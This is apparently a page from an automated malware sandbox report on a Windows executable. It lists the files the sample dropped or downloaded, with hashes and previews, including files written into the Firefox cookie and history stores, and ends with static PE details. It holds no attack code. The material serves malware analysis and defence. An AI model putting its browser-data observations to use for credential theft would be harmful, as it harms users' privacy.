Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir5528_968160063\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir5528_968160063\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir5528_968160063\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir5528_968160063\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\HrxOpVxK5d.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4166484885296375
Encrypted:	false
SSDEEP:	6144:Kcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNG5+:ni58oSWIZBk2MM6AFBoo
MD5:	F9C7F9186CAAA5B6EAB4E26E01978FEB
SHA1:	95BD001CC2BC88A00B3B223112020E01BE254A89
SHA-256:	3C1E0B25F0039736EF31016D2D3748BBDF9D5A13C0A3EB3E489AF76EC629EFE9
SHA-512:	AB7B242085DC4714859DAF247FFEAA2E0B721A6835392743C027FD96369CD9577DE9325693AC4D0AB0CF3CF21ECF20041C091C425250F5DEB0BCDB69BE4D21E8
Malicious:	false
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB.L,X2...............................................................................................................................................................................................................................................................................................................................................G[.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 463

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (8050)
Category:	downloaded
Size (bytes):	8055
Entropy (8bit):	5.783649737449899
Encrypted:	false
SSDEEP:	192:sjyFd66666d1UQNAfy2k7DyzjA2MG9O2wxeZhf1WRomOKy3ZKQ9vhbY:sjI666667UQNAfnkfyo6ex8foRvqZKQk
MD5:	04A67896BA48A84311DD8C53F746CE14
SHA1:	D390F1F60CDC96D043E88D600112967B380EA339
SHA-256:	86D1FAC6AEF9939473AA5937073FEAB120EFAFF6CBD0D9C3F5D1B0A6FFEBBF6F
SHA-512:	1971CF05A7EB4A1BE22A9DBB3CFE9FE2D41A5A1C06C179D3002544754A6C9FDEE85072F7196FC8E50C9E25DA720EF0B2C53E17A1EC05F554FDF7D9B6706C2A9D
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["deadpool wolverine","veterans day military discounts","pittsburgh steelers","ps5 pro games","snow storm weather forecast colorado","social security benefits","dear santa movie trailer","death stranding xbox"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"Cg0vZy8xMWcwNzNjbHdsEgkyMDI0IGZpbG0ywxNkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM04vL0FBQkVJQUVBQVFBTUJJZ0FDRVFFREVRSC94QUFjQUFBQ0F3QURBUUFBQUFBQUFBQUFBQUFHQndBRUJRSURDQUgveEFBekVBQUJBd0lGQXdJREJ3VUJBQUFBQUFBQkFnTUVCUkVBQmhJaE1STkJVUWRoRlNKeEZDTkNnWkdod1RKU1lySFJKUC9FQUJvQkFBSURBUUVBQUFBQUFBQUFBQUFBQUFRRkFBRURCZ0wveEFBb0VRQUNBZ0VEQW

Chrome Cache Entry: 464

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 465

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	174097
Entropy (8bit):	5.554845848492248
Encrypted:	false
SSDEEP:	3072:49GysOAIZQy3ZZb6L5BfizRURkgq3ocEs7BB19HDKDSfEISlCMDyQhnF/VU9cpar:49G3IZP3ZZmHfiz+R7q3ocV7BB19HDKq
MD5:	292ACC11525E24B0501DEAC4EB7B61D4
SHA1:	4840E1B06489D1210E25C620AC0E4DEA33F4A574
SHA-256:	A5CB759FC6BF64DD1E35731C88899928B098A359EFF9CA5B34B91F23ADE02C2B
SHA-512:	FBDB4B2B4B647F734B6E05D0495CE1135E9536D611BC567A3B47353FEC986B92412153C214EFE776BC6391239076B3DA6B79851C8BE036C00E4AD026F88CC683
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvi2-a6fPowp_OrDQczHs8e8wA2zQ"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.ej=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var fj,gj,ij,lj,oj,nj,hj,mj;fj=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};gj=function(){_.Ka()};ij=function(){hj===void 0&&(hj=typeof WeakMap==="function"?fj(WeakMap):null);return hj};lj=function(a,b){(_.jj\|\|(_.jj=new hj)).set(a,b);(_.kj\|\|(_.kj=new hj)).set(b,a)};.oj=function(a){if(mj===void 0){const b=new nj([],{});mj=Array.prototype.concat.call([],b).length===1}mj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.pj=function(a,b,c){a=_.zb(a,b,c);return Array.isArray(a)?a:_.Kc};_.qj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.rj=function(a,b){a===0&&(a=_.qj(a,b));return a\|1};_.sj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.tj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.xj=function(a,b,c,d,e,f,g){const h=a.ha;var k=!!(2&b);e=k?1:e;

Chrome Cache Entry: 466

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	133690
Entropy (8bit):	5.4330378088453894
Encrypted:	false
SSDEEP:	1536:i7C/VNg/7Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlg0CFlOve2dzAcJ82O:fG7vhSJjxeX431PBLx8OF9jmYsci2i6o
MD5:	59EFA60CC34642043A13FB0D6DA05687
SHA1:	DE30C204C77788A0689B0C51D4456686DEF97CCF
SHA-256:	13E9EA04EA2F9CEE2FB8F801568692B4204A026D6482497CA6203424CFAA3F01
SHA-512:	5BFCFA86BFD955C72F62D923798A10499320438AF02369284D4A310B6EB36E3FDCD2DF96F759B29A14C8DE5E7C4C47A2696E9A85D0F1B9FBB8315F407098C345
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 467

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1302)
Category:	downloaded
Size (bytes):	117949
Entropy (8bit):	5.4843553913091005
Encrypted:	false
SSDEEP:	3072:D7yvvjOy7sipKTr3dH39oogNLLDzZzS7oF:D7yjOy7LS39mnhS7oF
MD5:	A5D33473ED0997C008D1C053E0773EBE
SHA1:	FEB4CB89145601A0141CC5869BEDF9AE7CD5CB80
SHA-256:	14C27BB0224FCF89A43B444B427DABE3D0AF184CAA7B6B4990CE228C51AE01C1
SHA-512:	3C0A48F9FA05469F950D9A268F1B3E9285A783A555EE597A2E203B688EB0FBCAEA3F4DE9BC8F5381C661007D0C6C4AFA70C19B7826D69A0E2A914A55973D14BD
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);.var da,ea,ha,na,oa,sa,ta,wa;da=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);na=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r

Chrome Cache Entry: 468

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTthb_7uL8fi0CBKDba3xi6R0PUU9w"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 469

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.3558582524082
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HrxOpVxK5d.exe
File size:	696'320 bytes
MD5:	c4ac7a7ee7a9529b0148d9a64c43801b
SHA1:	f069ce0f887af125aa606f004f0b7baaf725f300
SHA256:	7a3c1f0a826eec9b77bbe25a3da2db497d2005238c494190f075b0a22b21006d
SHA512:	6b4bb83cb7ef91ca6c524b05c50017f8a9b3acadbc2122e557990ecf5e16573f121ee6c95f9bf25afec28a66ef95881ccbe8a2197a03891031839616124caccb
SSDEEP:	12288:HykVitmN3AUK9io6BF74ZNNuJby8gAmp+U0KtQRJxYTIEs:HykYAF74BuJEAmp+5Kmhx
TLSH:	86E4D02292F13D04FE768A318E3EC2E83E6FFB639FD5665921185A1F04B11A1E553F12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lg.............._......._......._........r.............._......._......._......Rich............PE..L.....ze.................b.

File Icon


Icon Hash:	738733b18bab8be8

Static PE Info

General

Entrypoint:	0x401bce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x657AF8A0 [Thu Dec 14 12:44:16 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
